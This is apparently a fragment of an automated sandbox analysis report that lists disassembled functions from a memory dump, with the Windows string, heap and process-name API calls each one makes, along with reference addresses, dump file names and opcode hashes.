                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 436eefc0be5ad0351088a3d87df374ecacae4a83eef59037b8eddfe1ba6dff14
                            • Instruction ID: e1c661bd15b8ea5f0f6129577fa9db65431cf3b5ca4f3d01478055c05fbb1c54
                            • Opcode Fuzzy Hash: 436eefc0be5ad0351088a3d87df374ecacae4a83eef59037b8eddfe1ba6dff14
                            • Instruction Fuzzy Hash: E10140B2904628ABCB149BC9DD45BBEB7BCFB4CB12F00011AF645E2290E7B85540D7B1
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 00B24492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00B244AD
                            • CloseHandle.KERNEL32(00000000), ref: 00B244B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B244E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: ce9995a8007b30c66927363b46d1656510987102bfaa60f32b273c5ed93ff669
                            • Instruction ID: 0cfe4f45a49f89e0a1a1c4634ef547399715d02748f8c3f33b29c4d39aaad3bb
                            • Opcode Fuzzy Hash: ce9995a8007b30c66927363b46d1656510987102bfaa60f32b273c5ed93ff669
                            • Instruction Fuzzy Hash: 15F0C8B09017256BE720AB74AC49BE6BBE8EF14304F0005E1FA59D7280DBF099858BA0
                            APIs
                            • __getptd.LIBCMT ref: 00B28FDD
                              • Part of subcall function 00B287FF: __amsg_exit.LIBCMT ref: 00B2880F
                            • __getptd.LIBCMT ref: 00B28FF4
                            • __amsg_exit.LIBCMT ref: 00B29002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00B29026
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: d88f8a43751f50c66b4a79ab58fe159080f66da21941cffc560fe3d80b1886b8
                            • Instruction ID: 574c4862072bbcab633e4cdb9c95697de7abdfe59bee9469ae38f7d9b3449b65
                            • Opcode Fuzzy Hash: d88f8a43751f50c66b4a79ab58fe159080f66da21941cffc560fe3d80b1886b8
                            • Instruction Fuzzy Hash: 60F0F0329896348BDB20BB78B806B0E33E0AF00720F3545C8F00CAB2E2DF241800EA5D
                            APIs
                            • lstrlen.KERNEL32(------,00B05BEB), ref: 00B2731B
                            • lstrcpy.KERNEL32(00000000), ref: 00B2733F
                            • lstrcat.KERNEL32(?,------), ref: 00B27349
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 8ab40ee58e108a63e77f31006a51a14eff5274305e4236b227faae163600faa5
                            • Instruction ID: 971894b52a97ebb35c9fbac82fb112051e75fd4f24dd8e590f393fea410e4244
                            • Opcode Fuzzy Hash: 8ab40ee58e108a63e77f31006a51a14eff5274305e4236b227faae163600faa5
                            • Instruction Fuzzy Hash: A2F039745007128FCB249F35E898926BBF8EF85700328886DA89AC3314EB30D841DB24
                            APIs
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13422
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13471
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13497
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: f8a191b5adc87f8c51a04180260cbb746577c02453caadb10fb79399e70933c2
                            • Instruction ID: 5234ab8d9240127183c566399186aac6294b82e0052a5bd350a4b3f876723484
                            • Opcode Fuzzy Hash: f8a191b5adc87f8c51a04180260cbb746577c02453caadb10fb79399e70933c2
                            • Instruction Fuzzy Hash: 3012CA70A012018FDB28CF19C554A65B7E5EF45B28B59C0EEE809DB3A6E772DD82CF50
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17CAF
                              • Part of subcall function 00B17D40: std::_Xinvalid_argument.LIBCPMT ref: 00B17D58
                              • Part of subcall function 00B17D40: std::_Xinvalid_argument.LIBCPMT ref: 00B17D76
                              • Part of subcall function 00B17D40: std::_Xinvalid_argument.LIBCPMT ref: 00B17D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: 82387c70face1bafd722b0b107060a847e55019b159cf12a260462e620a12701
                            • Instruction ID: 4387985fe07d3e78fed76fa31a87bbfd8831869b987aa3c99042b132a4e2d3a7
                            • Opcode Fuzzy Hash: 82387c70face1bafd722b0b107060a847e55019b159cf12a260462e620a12701
                            • Instruction Fuzzy Hash: E53128723482145BD720DE6CE8C09AAF7F9EF91760B7046BAF5428B641CB719DC083E4
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00B06F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B06F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: 105a198b9114e132dcb6b5a70ae6ac84a4e902b8f966e0ff564359bf4bea2c53
                            • Instruction ID: 0198ba3dd4d7dded8e5939d69b6012a0937b635ce5b4b4718f9c75b12a62020c
                            • Opcode Fuzzy Hash: 105a198b9114e132dcb6b5a70ae6ac84a4e902b8f966e0ff564359bf4bea2c53
                            • Instruction Fuzzy Hash: 2521AE706007028BEB208B20DC94BB677E8EB40700F4449B8F946CB6C4FBB4E945C760
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2244C
                            • lstrlen.KERNEL32(00000000), ref: 00B224E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B22570
                            • lstrlen.KERNEL32(00000000), ref: 00B22577
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 3dbfed9311872b3e8de6f54e81012f8e84f1c2dddd70063677221a4860ebf423
                            • Instruction ID: 187b6908f5391d72465bca8bd2dd3328fba6d25aebbec748ff066fd96f7a5c72
                            • Opcode Fuzzy Hash: 3dbfed9311872b3e8de6f54e81012f8e84f1c2dddd70063677221a4860ebf423
                            • Instruction Fuzzy Hash: E281B071E00315ABDB14DB98EC44BAEBBF5EF94300F1481A9E508E7381EB759D46CB94
                            APIs
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000), ref: 00B0162D
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000,?), ref: 00B0164F
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000,?), ref: 00B01671
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000,?), ref: 00B01693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 631aac0824bb3cb8e33e059154ce6ed98ec65cbc2fe001d7b29d03adf3587a48
                            • Instruction ID: 8eaa944948423abf651466f628a457c24c150a739e1a0c89a564ee2d8485cf7f
                            • Opcode Fuzzy Hash: 631aac0824bb3cb8e33e059154ce6ed98ec65cbc2fe001d7b29d03adf3587a48
                            • Instruction Fuzzy Hash: D231C274A01F029FC728DF3AC998956BBE5FF88300704496EA896C7B50DB70F811CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00B215A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B215D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21611
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21649
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 0716bfdf77d3c121b1b2d8b81bab7ddf8a14e81c4ac9364bb9e74fe795c2ac8e
                            • Instruction ID: 755b1068f826c12ea49a321b2ea369ef6a9c3a98636c6e2cf7cc22f0fbe36ffb
                            • Opcode Fuzzy Hash: 0716bfdf77d3c121b1b2d8b81bab7ddf8a14e81c4ac9364bb9e74fe795c2ac8e
                            • Instruction Fuzzy Hash: 6721D974601B029BD725DF2EE458A17B7F5FFA4700B0449ADA49AC7B80DB34E845CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00B0162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01693
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
